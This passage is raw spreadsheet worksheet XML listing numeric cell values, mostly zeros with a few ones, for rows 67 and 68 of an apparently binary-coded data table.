        <v>0</v>
      </c>
      <c r="T67">
        <v>0</v>
      </c>
      <c r="U67">
        <v>0</v>
      </c>
      <c r="V67">
        <v>0</v>
      </c>
      <c r="W67">
        <v>0</v>
      </c>
      <c r="X67">
        <v>0</v>
      </c>
      <c r="Y67">
        <v>0</v>
      </c>
      <c r="Z67">
        <v>0</v>
      </c>
      <c r="AA67">
        <v>0</v>
      </c>
      <c r="AB67">
        <v>0</v>
      </c>
      <c r="AC67">
        <v>0</v>
      </c>
      <c r="AD67">
        <v>0</v>
      </c>
      <c r="AE67">
        <v>0</v>
      </c>
      <c r="AF67">
        <v>0</v>
      </c>
      <c r="AG67">
        <v>0</v>
      </c>
      <c r="AH67">
        <v>0</v>
      </c>
      <c r="AI67">
        <v>0</v>
      </c>
      <c r="AJ67">
        <v>0</v>
      </c>
      <c r="AK67">
        <v>0</v>
      </c>
      <c r="AL67">
        <v>0</v>
      </c>
      <c r="AM67">
        <v>0</v>
      </c>
      <c r="AN67">
        <v>0</v>
      </c>
      <c r="AO67">
        <v>0</v>
      </c>
      <c r="AP67">
        <v>0</v>
      </c>
      <c r="AQ67">
        <v>0</v>
      </c>
      <c r="AR67">
        <v>0</v>
      </c>
      <c r="AS67">
        <v>0</v>
      </c>
      <c r="AT67">
        <v>0</v>
      </c>
      <c r="AU67">
        <v>0</v>
      </c>
      <c r="AV67">
        <v>0</v>
      </c>
      <c r="AW67">
        <v>0</v>
      </c>
      <c r="AX67">
        <v>0</v>
      </c>
      <c r="AY67">
        <v>0</v>
      </c>
      <c r="AZ67">
        <v>0</v>
      </c>
      <c r="BA67">
        <v>0</v>
      </c>
      <c r="BB67">
        <v>0</v>
      </c>
      <c r="BC67">
        <v>0</v>
      </c>
      <c r="BD67">
        <v>0</v>
      </c>
      <c r="BE67">
        <v>0</v>
      </c>
      <c r="BF67">
        <v>0</v>
      </c>
      <c r="BG67">
        <v>0</v>
      </c>
      <c r="BH67">
        <v>0</v>
      </c>
      <c r="BI67">
        <v>0</v>
      </c>
      <c r="BJ67">
        <v>0</v>
      </c>
      <c r="BK67">
        <v>0</v>
      </c>
      <c r="BL67">
        <v>0</v>
      </c>
      <c r="BM67">
        <v>0</v>
      </c>
      <c r="BN67">
        <v>0</v>
      </c>
      <c r="BO67">
        <v>0</v>
      </c>
      <c r="BP67">
        <v>0</v>
      </c>
      <c r="BQ67">
        <v>0</v>
      </c>
      <c r="BR67">
        <v>0</v>
      </c>
      <c r="BS67">
        <v>0</v>
      </c>
      <c r="BT67">
        <v>0</v>
      </c>
      <c r="BU67">
        <v>0</v>
      </c>
      <c r="BV67">
        <v>0</v>
      </c>
      <c r="BW67">
        <v>0</v>
      </c>
      <c r="BX67">
        <v>0</v>
      </c>
      <c r="BY67">
        <v>0</v>
      </c>
      <c r="BZ67">
        <v>0</v>
      </c>
      <c r="CA67">
        <v>0</v>
      </c>
      <c r="CB67">
        <v>0</v>
      </c>
      <c r="CC67">
        <v>0</v>
      </c>
      <c r="CD67">
        <v>0</v>
      </c>
      <c r="CE67">
        <v>0</v>
      </c>
      <c r="CF67">
        <v>0</v>
      </c>
      <c r="CG67">
        <v>0</v>
      </c>
      <c r="CH67">
        <v>0</v>
      </c>
      <c r="CI67">
        <v>0</v>
      </c>
      <c r="CJ67">
        <v>0</v>
      </c>
      <c r="CK67">
        <v>0</v>
      </c>
      <c r="CL67">
        <v>0</v>
      </c>
      <c r="CM67">
        <v>0</v>
      </c>
      <c r="CN67">
        <v>0</v>
      </c>
      <c r="CO67">
        <v>0</v>
      </c>
      <c r="CP67">
        <v>0</v>
      </c>
      <c r="CQ67">
        <v>0</v>
      </c>
      <c r="CR67">
        <v>0</v>
      </c>
      <c r="CS67">
        <v>0</v>
      </c>
      <c r="CT67">
        <v>0</v>
      </c>
      <c r="CU67">
        <v>0</v>
      </c>
      <c r="CV67">
        <v>0</v>
      </c>
      <c r="CW67">
        <v>0</v>
      </c>
      <c r="CX67">
        <v>0</v>
      </c>
      <c r="CY67">
        <v>0</v>
      </c>
      <c r="CZ67">
        <v>0</v>
      </c>
      <c r="DA67">
        <v>0</v>
      </c>
      <c r="DB67">
        <v>0</v>
      </c>
      <c r="DC67">
        <v>0</v>
      </c>
      <c r="DD67">
        <v>0</v>
      </c>
      <c r="DE67">
        <v>0</v>
      </c>
      <c r="DF67">
        <v>0</v>
      </c>
      <c r="DG67">
        <v>0</v>
      </c>
      <c r="DH67">
        <v>0</v>
      </c>
      <c r="DI67">
        <v>0</v>
      </c>
      <c r="DJ67">
        <v>0</v>
      </c>
      <c r="DK67">
        <v>0</v>
      </c>
      <c r="DL67">
        <v>0</v>
      </c>
      <c r="DM67">
        <v>0</v>
      </c>
      <c r="DN67">
        <v>0</v>
      </c>
      <c r="DO67">
        <v>0</v>
      </c>
      <c r="DP67">
        <v>0</v>
      </c>
      <c r="DQ67">
        <v>0</v>
      </c>
      <c r="DR67">
        <v>0</v>
      </c>
      <c r="DS67">
        <v>0</v>
      </c>
      <c r="DT67">
        <v>0</v>
      </c>
      <c r="DU67">
        <v>0</v>
      </c>
      <c r="DV67">
        <v>0</v>
      </c>
      <c r="DW67">
        <v>0</v>
      </c>
      <c r="DX67">
        <v>0</v>
      </c>
      <c r="DY67">
        <v>0</v>
      </c>
      <c r="DZ67">
        <v>0</v>
      </c>
      <c r="EA67">
        <v>0</v>
      </c>
      <c r="EB67">
        <v>0</v>
      </c>
      <c r="EC67">
        <v>0</v>
      </c>
      <c r="ED67">
        <v>0</v>
      </c>
      <c r="EE67">
        <v>0</v>
      </c>
      <c r="EF67">
        <v>0</v>
      </c>
      <c r="EG67">
        <v>0</v>
      </c>
      <c r="EH67">
        <v>0</v>
      </c>
      <c r="EI67">
        <v>0</v>
      </c>
      <c r="EJ67">
        <v>0</v>
      </c>
      <c r="EK67">
        <v>0</v>
      </c>
      <c r="EL67">
        <v>0</v>
      </c>
      <c r="EM67">
        <v>0</v>
      </c>
      <c r="EN67">
        <v>0</v>
      </c>
      <c r="EO67">
        <v>0</v>
      </c>
      <c r="EP67">
        <v>0</v>
      </c>
      <c r="EQ67">
        <v>0</v>
      </c>
      <c r="ER67">
        <v>0</v>
      </c>
      <c r="ES67">
        <v>0</v>
      </c>
      <c r="ET67">
        <v>0</v>
      </c>
      <c r="EU67">
        <v>0</v>
      </c>
      <c r="EV67">
        <v>0</v>
      </c>
      <c r="EW67">
        <v>0</v>
      </c>
      <c r="EX67">
        <v>0</v>
      </c>
      <c r="EY67">
        <v>0</v>
      </c>
      <c r="EZ67">
        <v>0</v>
      </c>
      <c r="FA67">
        <v>0</v>
      </c>
      <c r="FB67">
        <v>0</v>
      </c>
      <c r="FC67">
        <v>0</v>
      </c>
      <c r="FD67">
        <v>0</v>
      </c>
      <c r="FE67">
        <v>0</v>
      </c>
      <c r="FF67">
        <v>0</v>
      </c>
      <c r="FG67">
        <v>0</v>
      </c>
      <c r="FH67">
        <v>0</v>
      </c>
      <c r="FI67">
        <v>0</v>
      </c>
      <c r="FJ67">
        <v>0</v>
      </c>
      <c r="FK67">
        <v>0</v>
      </c>
      <c r="FL67">
        <v>0</v>
      </c>
      <c r="FM67">
        <v>0</v>
      </c>
      <c r="FN67">
        <v>0</v>
      </c>
      <c r="FO67">
        <v>0</v>
      </c>
      <c r="FP67">
        <v>0</v>
      </c>
      <c r="FQ67">
        <v>0</v>
      </c>
      <c r="FR67">
        <v>0</v>
      </c>
      <c r="FS67">
        <v>0</v>
      </c>
      <c r="FT67">
        <v>0</v>
      </c>
      <c r="FU67">
        <v>0</v>
      </c>
      <c r="FV67">
        <v>0</v>
      </c>
      <c r="FW67">
        <v>0</v>
      </c>
      <c r="FX67">
        <v>0</v>
      </c>
      <c r="FY67">
        <v>0</v>
      </c>
      <c r="FZ67">
        <v>0</v>
      </c>
      <c r="GA67">
        <v>0</v>
      </c>
      <c r="GB67">
        <v>0</v>
      </c>
      <c r="GC67">
        <v>0</v>
      </c>
      <c r="GD67">
        <v>0</v>
      </c>
      <c r="GE67">
        <v>0</v>
      </c>
      <c r="GF67">
        <v>0</v>
      </c>
      <c r="GG67">
        <v>0</v>
      </c>
      <c r="GH67">
        <v>0</v>
      </c>
      <c r="GI67">
        <v>0</v>
      </c>
      <c r="GJ67">
        <v>0</v>
      </c>
      <c r="GK67">
        <v>0</v>
      </c>
      <c r="GL67">
        <v>0</v>
      </c>
      <c r="GM67">
        <v>0</v>
      </c>
      <c r="GN67">
        <v>0</v>
      </c>
      <c r="GO67">
        <v>0</v>
      </c>
      <c r="GP67">
        <v>0</v>
      </c>
      <c r="GQ67">
        <v>0</v>
      </c>
      <c r="GR67">
        <v>0</v>
      </c>
      <c r="GS67">
        <v>0</v>
      </c>
      <c r="GT67">
        <v>0</v>
      </c>
      <c r="GU67">
        <v>0</v>
      </c>
      <c r="GV67">
        <v>0</v>
      </c>
      <c r="GW67">
        <v>0</v>
      </c>
      <c r="GX67">
        <v>0</v>
      </c>
      <c r="GY67">
        <v>0</v>
      </c>
      <c r="GZ67">
        <v>0</v>
      </c>
      <c r="HA67">
        <v>0</v>
      </c>
      <c r="HB67">
        <v>0</v>
      </c>
      <c r="HC67">
        <v>0</v>
      </c>
      <c r="HD67">
        <v>0</v>
      </c>
      <c r="HE67">
        <v>0</v>
      </c>
      <c r="HF67">
        <v>0</v>
      </c>
      <c r="HG67">
        <v>0</v>
      </c>
      <c r="HH67">
        <v>0</v>
      </c>
      <c r="HI67">
        <v>0</v>
      </c>
      <c r="HJ67">
        <v>0</v>
      </c>
      <c r="HK67">
        <v>0</v>
      </c>
      <c r="HL67">
        <v>0</v>
      </c>
      <c r="HM67">
        <v>0</v>
      </c>
      <c r="HN67">
        <v>0</v>
      </c>
      <c r="HO67">
        <v>0</v>
      </c>
      <c r="HP67">
        <v>0</v>
      </c>
      <c r="HQ67">
        <v>0</v>
      </c>
      <c r="HR67">
        <v>0</v>
      </c>
      <c r="HS67">
        <v>0</v>
      </c>
      <c r="HT67">
        <v>0</v>
      </c>
      <c r="HU67">
        <v>0</v>
      </c>
      <c r="HV67">
        <v>0</v>
      </c>
      <c r="HW67">
        <v>0</v>
      </c>
      <c r="HX67">
        <v>0</v>
      </c>
      <c r="HY67">
        <v>0</v>
      </c>
      <c r="HZ67">
        <v>0</v>
      </c>
      <c r="IA67">
        <v>0</v>
      </c>
      <c r="IB67">
        <v>0</v>
      </c>
      <c r="IC67">
        <v>0</v>
      </c>
      <c r="ID67">
        <v>0</v>
      </c>
      <c r="IE67">
        <v>0</v>
      </c>
      <c r="IF67">
        <v>0</v>
      </c>
      <c r="IG67">
        <v>0</v>
      </c>
      <c r="IH67">
        <v>0</v>
      </c>
      <c r="II67">
        <v>0</v>
      </c>
      <c r="IJ67">
        <v>0</v>
      </c>
      <c r="IK67">
        <v>0</v>
      </c>
      <c r="IL67">
        <v>0</v>
      </c>
      <c r="IM67">
        <v>0</v>
      </c>
      <c r="IN67">
        <v>0</v>
      </c>
      <c r="IO67">
        <v>0</v>
      </c>
      <c r="IP67">
        <v>0</v>
      </c>
      <c r="IQ67">
        <v>0</v>
      </c>
      <c r="IR67">
        <v>0</v>
      </c>
      <c r="IS67">
        <v>0</v>
      </c>
      <c r="IT67">
        <v>0</v>
      </c>
      <c r="IU67">
        <v>0</v>
      </c>
      <c r="IV67">
        <v>0</v>
      </c>
      <c r="IW67">
        <v>0</v>
      </c>
      <c r="IX67">
        <v>0</v>
      </c>
      <c r="IY67">
        <v>0</v>
      </c>
      <c r="IZ67">
        <v>0</v>
      </c>
      <c r="JA67">
        <v>0</v>
      </c>
      <c r="JB67">
        <v>0</v>
      </c>
      <c r="JC67">
        <v>0</v>
      </c>
      <c r="JD67">
        <v>0</v>
      </c>
      <c r="JE67">
        <v>0</v>
      </c>
      <c r="JF67">
        <v>0</v>
      </c>
      <c r="JG67">
        <v>0</v>
      </c>
      <c r="JH67">
        <v>0</v>
      </c>
      <c r="JI67">
        <v>0</v>
      </c>
      <c r="JJ67">
        <v>0</v>
      </c>
      <c r="JK67">
        <v>0</v>
      </c>
      <c r="JL67">
        <v>0</v>
      </c>
      <c r="JM67">
        <v>0</v>
      </c>
      <c r="JN67">
        <v>0</v>
      </c>
      <c r="JO67">
        <v>0</v>
      </c>
      <c r="JP67">
        <v>0</v>
      </c>
      <c r="JQ67">
        <v>0</v>
      </c>
      <c r="JR67">
        <v>0</v>
      </c>
      <c r="JS67">
        <v>0</v>
      </c>
      <c r="JT67">
        <v>0</v>
      </c>
      <c r="JU67">
        <v>0</v>
      </c>
      <c r="JV67">
        <v>0</v>
      </c>
      <c r="JW67">
        <v>0</v>
      </c>
      <c r="JX67">
        <v>0</v>
      </c>
      <c r="JY67">
        <v>0</v>
      </c>
      <c r="JZ67">
        <v>0</v>
      </c>
      <c r="KA67">
        <v>0</v>
      </c>
      <c r="KB67">
        <v>0</v>
      </c>
      <c r="KC67">
        <v>0</v>
      </c>
      <c r="KD67">
        <v>0</v>
      </c>
      <c r="KE67">
        <v>0</v>
      </c>
      <c r="KF67">
        <v>0</v>
      </c>
      <c r="KG67">
        <v>0</v>
      </c>
      <c r="KH67">
        <v>0</v>
      </c>
      <c r="KI67">
        <v>0</v>
      </c>
      <c r="KJ67">
        <v>0</v>
      </c>
      <c r="KK67">
        <v>0</v>
      </c>
      <c r="KL67">
        <v>0</v>
      </c>
      <c r="KM67">
        <v>0</v>
      </c>
      <c r="KN67">
        <v>0</v>
      </c>
      <c r="KO67">
        <v>0</v>
      </c>
      <c r="KP67">
        <v>0</v>
      </c>
      <c r="KQ67">
        <v>0</v>
      </c>
      <c r="KR67">
        <v>0</v>
      </c>
      <c r="KS67">
        <v>0</v>
      </c>
      <c r="KT67">
        <v>0</v>
      </c>
      <c r="KU67">
        <v>0</v>
      </c>
      <c r="KV67">
        <v>0</v>
      </c>
      <c r="KW67">
        <v>0</v>
      </c>
      <c r="KX67">
        <v>0</v>
      </c>
      <c r="KY67">
        <v>0</v>
      </c>
      <c r="KZ67">
        <v>0</v>
      </c>
      <c r="LA67">
        <v>0</v>
      </c>
      <c r="LB67">
        <v>0</v>
      </c>
      <c r="LC67">
        <v>0</v>
      </c>
      <c r="LD67">
        <v>0</v>
      </c>
      <c r="LE67">
        <v>1</v>
      </c>
      <c r="LF67">
        <v>0</v>
      </c>
      <c r="LG67">
        <v>0</v>
      </c>
      <c r="LH67">
        <v>0</v>
      </c>
      <c r="LI67">
        <v>0</v>
      </c>
      <c r="LJ67">
        <v>0</v>
      </c>
      <c r="LK67">
        <v>0</v>
      </c>
      <c r="LL67">
        <v>0</v>
      </c>
      <c r="LM67">
        <v>0</v>
      </c>
      <c r="LN67">
        <v>0</v>
      </c>
      <c r="LO67">
        <v>0</v>
      </c>
      <c r="LP67">
        <v>0</v>
      </c>
      <c r="LQ67">
        <v>0</v>
      </c>
      <c r="LR67">
        <v>0</v>
      </c>
      <c r="LS67">
        <v>0</v>
      </c>
      <c r="LT67">
        <v>0</v>
      </c>
      <c r="LU67">
        <v>0</v>
      </c>
      <c r="LV67">
        <v>0</v>
      </c>
      <c r="LW67">
        <v>0</v>
      </c>
      <c r="LX67">
        <v>0</v>
      </c>
      <c r="LY67">
        <v>0</v>
      </c>
      <c r="LZ67">
        <v>0</v>
      </c>
      <c r="MA67">
        <v>0</v>
      </c>
      <c r="MB67">
        <v>0</v>
      </c>
      <c r="MC67">
        <v>0</v>
      </c>
      <c r="MD67">
        <v>0</v>
      </c>
      <c r="ME67">
        <v>0</v>
      </c>
      <c r="MF67">
        <v>0</v>
      </c>
      <c r="MG67">
        <v>0</v>
      </c>
      <c r="MH67">
        <v>0</v>
      </c>
      <c r="MI67">
        <v>0</v>
      </c>
      <c r="MJ67">
        <v>0</v>
      </c>
      <c r="MK67">
        <v>0</v>
      </c>
      <c r="ML67">
        <v>0</v>
      </c>
      <c r="MM67">
        <v>0</v>
      </c>
      <c r="MN67">
        <v>0</v>
      </c>
      <c r="MO67">
        <v>0</v>
      </c>
      <c r="MP67">
        <v>0</v>
      </c>
      <c r="MQ67">
        <v>0</v>
      </c>
      <c r="MR67">
        <v>0</v>
      </c>
      <c r="MS67">
        <v>0</v>
      </c>
      <c r="MT67">
        <v>0</v>
      </c>
      <c r="MU67">
        <v>0</v>
      </c>
      <c r="MV67">
        <v>0</v>
      </c>
      <c r="MW67">
        <v>0</v>
      </c>
      <c r="MX67">
        <v>0</v>
      </c>
      <c r="MY67">
        <v>0</v>
      </c>
      <c r="MZ67">
        <v>0</v>
      </c>
      <c r="NA67">
        <v>0</v>
      </c>
      <c r="NB67">
        <v>0</v>
      </c>
      <c r="NC67">
        <v>0</v>
      </c>
      <c r="ND67">
        <v>0</v>
      </c>
      <c r="NE67">
        <v>0</v>
      </c>
      <c r="NF67">
        <v>0</v>
      </c>
      <c r="NG67">
        <v>0</v>
      </c>
      <c r="NH67">
        <v>0</v>
      </c>
      <c r="NI67">
        <v>0</v>
      </c>
      <c r="NJ67">
        <v>0</v>
      </c>
      <c r="NK67">
        <v>0</v>
      </c>
      <c r="NL67">
        <v>0</v>
      </c>
      <c r="NM67">
        <v>0</v>
      </c>
      <c r="NN67">
        <v>0</v>
      </c>
      <c r="NO67">
        <v>0</v>
      </c>
      <c r="NP67">
        <v>0</v>
      </c>
      <c r="NQ67">
        <v>0</v>
      </c>
      <c r="NR67">
        <v>0</v>
      </c>
      <c r="NS67">
        <v>0</v>
      </c>
      <c r="NT67">
        <v>0</v>
      </c>
      <c r="NU67">
        <v>0</v>
      </c>
      <c r="NV67">
        <v>0</v>
      </c>
      <c r="NW67">
        <v>0</v>
      </c>
      <c r="NX67">
        <v>0</v>
      </c>
      <c r="NY67">
        <v>0</v>
      </c>
      <c r="NZ67">
        <v>0</v>
      </c>
      <c r="OA67">
        <v>0</v>
      </c>
      <c r="OB67">
        <v>0</v>
      </c>
      <c r="OC67">
        <v>0</v>
      </c>
      <c r="OD67">
        <v>0</v>
      </c>
      <c r="OE67">
        <v>0</v>
      </c>
      <c r="OF67">
        <v>0</v>
      </c>
      <c r="OG67">
        <v>0</v>
      </c>
      <c r="OH67">
        <v>0</v>
      </c>
      <c r="OI67">
        <v>0</v>
      </c>
      <c r="OJ67">
        <v>0</v>
      </c>
      <c r="OK67">
        <v>0</v>
      </c>
      <c r="OL67">
        <v>0</v>
      </c>
      <c r="OM67">
        <v>0</v>
      </c>
      <c r="ON67">
        <v>0</v>
      </c>
      <c r="OO67">
        <v>0</v>
      </c>
      <c r="OP67">
        <v>0</v>
      </c>
      <c r="OQ67">
        <v>0</v>
      </c>
      <c r="OR67">
        <v>0</v>
      </c>
      <c r="OS67">
        <v>0</v>
      </c>
      <c r="OT67">
        <v>0</v>
      </c>
      <c r="OU67">
        <v>0</v>
      </c>
      <c r="OV67">
        <v>0</v>
      </c>
      <c r="OW67">
        <v>0</v>
      </c>
      <c r="OX67">
        <v>0</v>
      </c>
      <c r="OY67">
        <v>0</v>
      </c>
      <c r="OZ67">
        <v>0</v>
      </c>
      <c r="PA67">
        <v>0</v>
      </c>
      <c r="PB67">
        <v>0</v>
      </c>
      <c r="PC67">
        <v>0</v>
      </c>
      <c r="PD67">
        <v>0</v>
      </c>
      <c r="PE67">
        <v>0</v>
      </c>
      <c r="PF67">
        <v>1</v>
      </c>
      <c r="PG67">
        <v>0</v>
      </c>
      <c r="PH67">
        <v>0</v>
      </c>
      <c r="PI67">
        <v>0</v>
      </c>
      <c r="PJ67">
        <v>0</v>
      </c>
      <c r="PK67">
        <v>0</v>
      </c>
      <c r="PL67">
        <v>0</v>
      </c>
      <c r="PM67">
        <v>0</v>
      </c>
      <c r="PN67">
        <v>0</v>
      </c>
      <c r="PO67">
        <v>0</v>
      </c>
      <c r="PP67">
        <v>0</v>
      </c>
      <c r="PQ67">
        <v>0</v>
      </c>
      <c r="PR67">
        <v>0</v>
      </c>
      <c r="PS67">
        <v>0</v>
      </c>
      <c r="PT67">
        <v>0</v>
      </c>
      <c r="PU67">
        <v>0</v>
      </c>
      <c r="PV67">
        <v>0</v>
      </c>
      <c r="PW67">
        <v>0</v>
      </c>
      <c r="PX67">
        <v>0</v>
      </c>
      <c r="PY67">
        <v>0</v>
      </c>
      <c r="PZ67">
        <v>0</v>
      </c>
      <c r="QA67">
        <v>0</v>
      </c>
      <c r="QB67">
        <v>0</v>
      </c>
      <c r="QC67">
        <v>0</v>
      </c>
      <c r="QD67">
        <v>0</v>
      </c>
      <c r="QE67">
        <v>0</v>
      </c>
      <c r="QF67">
        <v>0</v>
      </c>
      <c r="QG67">
        <v>0</v>
      </c>
      <c r="QH67">
        <v>0</v>
      </c>
      <c r="QI67">
        <v>0</v>
      </c>
      <c r="QJ67">
        <v>0</v>
      </c>
      <c r="QK67">
        <v>0</v>
      </c>
      <c r="QL67">
        <v>0</v>
      </c>
      <c r="QM67">
        <v>0</v>
      </c>
      <c r="QN67">
        <v>0</v>
      </c>
      <c r="QO67">
        <v>0</v>
      </c>
      <c r="QP67">
        <v>0</v>
      </c>
      <c r="QQ67">
        <v>0</v>
      </c>
      <c r="QR67">
        <v>0</v>
      </c>
      <c r="QS67">
        <v>0</v>
      </c>
      <c r="QT67">
        <v>0</v>
      </c>
      <c r="QU67">
        <v>0</v>
      </c>
      <c r="QV67">
        <v>0</v>
      </c>
      <c r="QW67">
        <v>0</v>
      </c>
      <c r="QX67">
        <v>0</v>
      </c>
      <c r="QY67">
        <v>0</v>
      </c>
      <c r="QZ67">
        <v>0</v>
      </c>
      <c r="RA67">
        <v>0</v>
      </c>
      <c r="RB67">
        <v>0</v>
      </c>
      <c r="RC67">
        <v>0</v>
      </c>
      <c r="RD67">
        <v>0</v>
      </c>
      <c r="RE67">
        <v>0</v>
      </c>
      <c r="RF67">
        <v>0</v>
      </c>
      <c r="RG67">
        <v>0</v>
      </c>
      <c r="RH67">
        <v>0</v>
      </c>
      <c r="RI67">
        <v>0</v>
      </c>
      <c r="RJ67">
        <v>0</v>
      </c>
      <c r="RK67">
        <v>0</v>
      </c>
      <c r="RL67">
        <v>0</v>
      </c>
      <c r="RM67">
        <v>0</v>
      </c>
      <c r="RN67">
        <v>0</v>
      </c>
      <c r="RO67">
        <v>0</v>
      </c>
      <c r="RP67">
        <v>0</v>
      </c>
      <c r="RQ67">
        <v>0</v>
      </c>
      <c r="RR67">
        <v>0</v>
      </c>
      <c r="RS67">
        <v>0</v>
      </c>
      <c r="RT67">
        <v>0</v>
      </c>
      <c r="RU67">
        <v>0</v>
      </c>
      <c r="RV67">
        <v>0</v>
      </c>
      <c r="RW67">
        <v>0</v>
      </c>
      <c r="RX67">
        <v>0</v>
      </c>
      <c r="RY67">
        <v>0</v>
      </c>
      <c r="RZ67">
        <v>0</v>
      </c>
      <c r="SA67">
        <v>0</v>
      </c>
    </row>
    <row r="68" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A68" s="6" t="s">
        <v>3156</v>
      </c>
      <c r="B68">
        <v>6</v>
      </c>
      <c r="C68">
        <v>0</v>
      </c>
      <c r="D68">
        <v>0</v>
      </c>
      <c r="E68">
        <v>0</v>
      </c>
      <c r="F68">
        <v>0</v>
      </c>
      <c r="G68">
        <v>0</v>
      </c>
      <c r="H68">
        <v>0</v>
      </c>
      <c r="I68">
        <v>0</v>
      </c>
      <c r="J68">
        <v>0</v>
      </c>
      <c r="K68">
        <v>0</v>
      </c>
      <c r="L68">
        <v>0</v>
      </c>
      <c r="M68">
        <v>0</v>
      </c>
      <c r="N68">
        <v>0</v>
      </c>
      <c r="O68">
        <v>0</v>
      </c>
      <c r="P68">
        <v>0</v>
      </c>
      <c r="Q68">
        <v>0</v>
      </c>
      <c r="R68">
        <v>0</v>
      </c>
      <c r="S68">
        <v>0</v>
      </c>
      <c r="T68">
        <v>0</v>
      </c>
      <c r="U68">
        <v>0</v>
      </c>
      <c r="V68">
        <v>0</v>
      </c>
      <c r="W68">
        <v>0</v>
      </c>
      <c r="X68">
        <v>0</v>
      </c>
      <c r="Y68">
        <v>0</v>
      </c>
      <c r="Z68">
        <v>0</v>
      </c>
      <c r="AA68">
        <v>0</v>
      </c>
      <c r="AB68">
        <v>0</v>
      </c>
      <c r="AC68">
        <v>0</v>
      </c>
      <c r="AD68">
        <v>0</v>
      </c>
      <c r="AE68">
        <v>0</v>
      </c>
      <c r="AF68">
        <v>0</v>
      </c>
      <c r="AG68">
        <v>0</v>
      </c>
      <c r="AH68">
        <v>0</v>
      </c>
      <c r="AI68">
        <v>0</v>
      </c>
      <c r="AJ68">
        <v>0</v>
      </c>
      <c r="AK68">
        <v>0</v>
      </c>
      <c r="AL68">
        <v>0</v>
      </c>
      <c r="AM68">
        <v>0</v>
      </c>
      <c r="AN68">
        <v>0</v>
      </c>
      <c r="AO68">
        <v>0</v>
      </c>
      <c r="AP68">
        <v>0</v>
      </c>
      <c r="AQ68">
        <v>0</v>
      </c>
      <c r="AR68">
        <v>0</v>
      </c>
      <c r="AS68">
        <v>0</v>
      </c>
      <c r="AT68">
        <v>0</v>
      </c>
      <c r="AU68">
        <v>0</v>
      </c>
      <c r="AV68">
        <v>0</v>
      </c>
      <c r="AW68">
        <v>0</v>
      </c>
      <c r="AX68">
        <v>0</v>
      </c>
      <c r="AY68">
        <v>0</v>
      </c>
      <c r="AZ68">
        <v>0</v>
      </c>
      <c r="BA68">
        <v>0</v>
      </c>
      <c r="BB68">
        <v>0</v>
      </c>
      <c r="BC68">
        <v>0</v>
      </c>
      <c r="BD68">
        <v>0</v>
      </c>
      <c r="BE68">
        <v>0</v>
      </c>
      <c r="BF68">
        <v>0</v>
      </c>
      <c r="BG68">
        <v>0</v>
      </c>
      <c r="BH68">
        <v>0</v>
      </c>
      <c r="BI68">
        <v>0</v>
      </c>
      <c r="BJ68">
        <v>0</v>
      </c>
      <c r="BK68">
        <v>0</v>
      </c>
      <c r="BL68">
        <v>0</v>
      </c>
      <c r="BM68">
        <v>0</v>
      </c>
      <c r="BN68">
        <v>0</v>
      </c>
      <c r="BO68">
        <v>0</v>
      </c>
      <c r="BP68">
        <v>0</v>
      </c>
      <c r="BQ68">
        <v>0</v>
      </c>
      <c r="BR68">
        <v>0</v>
      </c>
      <c r="BS68">
        <v>0</v>
      </c>
      <c r="BT68">
        <v>0</v>
      </c>
      <c r="BU68">
        <v>0</v>
      </c>
      <c r="BV68">
        <v>0</v>
      </c>
      <c r="BW68">
        <v>0</v>
      </c>
      <c r="BX68">
        <v>0</v>
      </c>
      <c r="BY68">
        <v>0</v>
      </c>
      <c r="BZ68">
        <v>0</v>
      </c>
      <c r="CA68">
        <v>0</v>
      </c>
      <c r="CB68">
        <v>0</v>
      </c>
      <c r="CC68">
        <v>0</v>
      </c>
      <c r="CD68">
        <v>0</v>
      </c>
      <c r="CE68">
        <v>0</v>
      </c>
      <c r="CF68">
        <v>0</v>
      </c>
      <c r="CG68">
        <v>0</v>
      </c>
      <c r="CH68">
        <v>0</v>
      </c>
      <c r="CI68">
        <v>0</v>
      </c>
      <c r="CJ68">
        <v>0</v>
      </c>
      <c r="CK68">
        <v>0</v>
      </c>
      <c r="CL68">
        <v>0</v>
      </c>
      <c r="CM68">
        <v>0</v>
      </c>
      <c r="CN68">
        <v>0</v>
      </c>
      <c r="CO68">
        <v>0</v>
      </c>
      <c r="CP68">
        <v>0</v>
      </c>
      <c r="CQ68">
        <v>0</v>
      </c>
      <c r="CR68">
        <v>0</v>
      </c>
      <c r="CS68">
        <v>0</v>
      </c>
      <c r="CT68">
        <v>0</v>
      </c>
      <c r="CU68">
        <v>0</v>
      </c>
      <c r="CV68">
        <v>0</v>
      </c>
      <c r="CW68">
        <v>0</v>
      </c>
      <c r="CX68">
        <v>0</v>
      </c>
      <c r="CY68">
        <v>0</v>
      </c>
      <c r="CZ68">
        <v>0</v>
      </c>
      <c r="DA68">
        <v>0</v>
      </c>
      <c r="DB68">
        <v>0</v>
      </c>
      <c r="DC68">
        <v>0</v>
      </c>
      <c r="DD68">
        <v>0</v>
      </c>
      <c r="DE68">
        <v>0</v>
      </c>
      <c r="DF68">
        <v>0</v>
      </c>
      <c r="DG68">
        <v>0</v>
      </c>
      <c r="DH68">
        <v>0</v>
      </c>
      <c r="DI68">
        <v>0</v>
      </c>
      <c r="DJ68">
        <v>0</v>
      </c>
      <c r="DK68">
        <v>0</v>
      </c>
      <c r="DL68">
        <v>0</v>
      </c>
      <c r="DM68">
        <v>0</v>
      </c>
      <c r="DN68">
        <v>0</v>
      </c>
      <c r="DO68">
        <v>0</v>
      </c>
      <c r="DP68">
        <v>0</v>
      </c>
      <c r="DQ68">
        <v>0</v>
      </c>
      <c r="DR68">
        <v>0</v>
      </c>
      <c r="DS68">
        <v>0</v>
      </c>
      <c r="DT68">
        <v>0</v>
      </c>
      <c r="DU68">
        <v>0</v>
      </c>
      <c r="DV68">
        <v>0</v>
      </c>
      <c r="DW68">
        <v>0</v>
      </c>
      <c r="DX68">
        <v>0</v>
      </c>
      <c r="DY68">
        <v>0</v>
      </c>
      <c r="DZ68">
        <v>0</v>
      </c>
      <c r="EA68">
        <v>0</v>
      </c>
      <c r="EB68">
        <v>0</v>
      </c>
      <c r="EC68">
        <v>0</v>
      </c>
      <c r="ED68">
        <v>0</v>
      </c>
      <c r="EE68">
        <v>0</v>
      </c>
      <c r="EF68">
        <v>0</v>
      </c>
      <c r="EG68">
        <v>0</v>
      </c>
      <c r="EH68">
        <v>0</v>
      </c>
      <c r="EI68">
        <v>0</v>
      </c>
      <c r="EJ68">
        <v>0</v>
      </c>
      <c r="EK68">
        <v>0</v>
      </c>
      <c r="EL68">
        <v>0</v>
      </c>
      <c r="EM68">
        <v>0</v>
      </c>
      <c r="EN68">
        <v>0</v>
      </c>
      <c r="EO68">
        <v>0</v>
      </c>
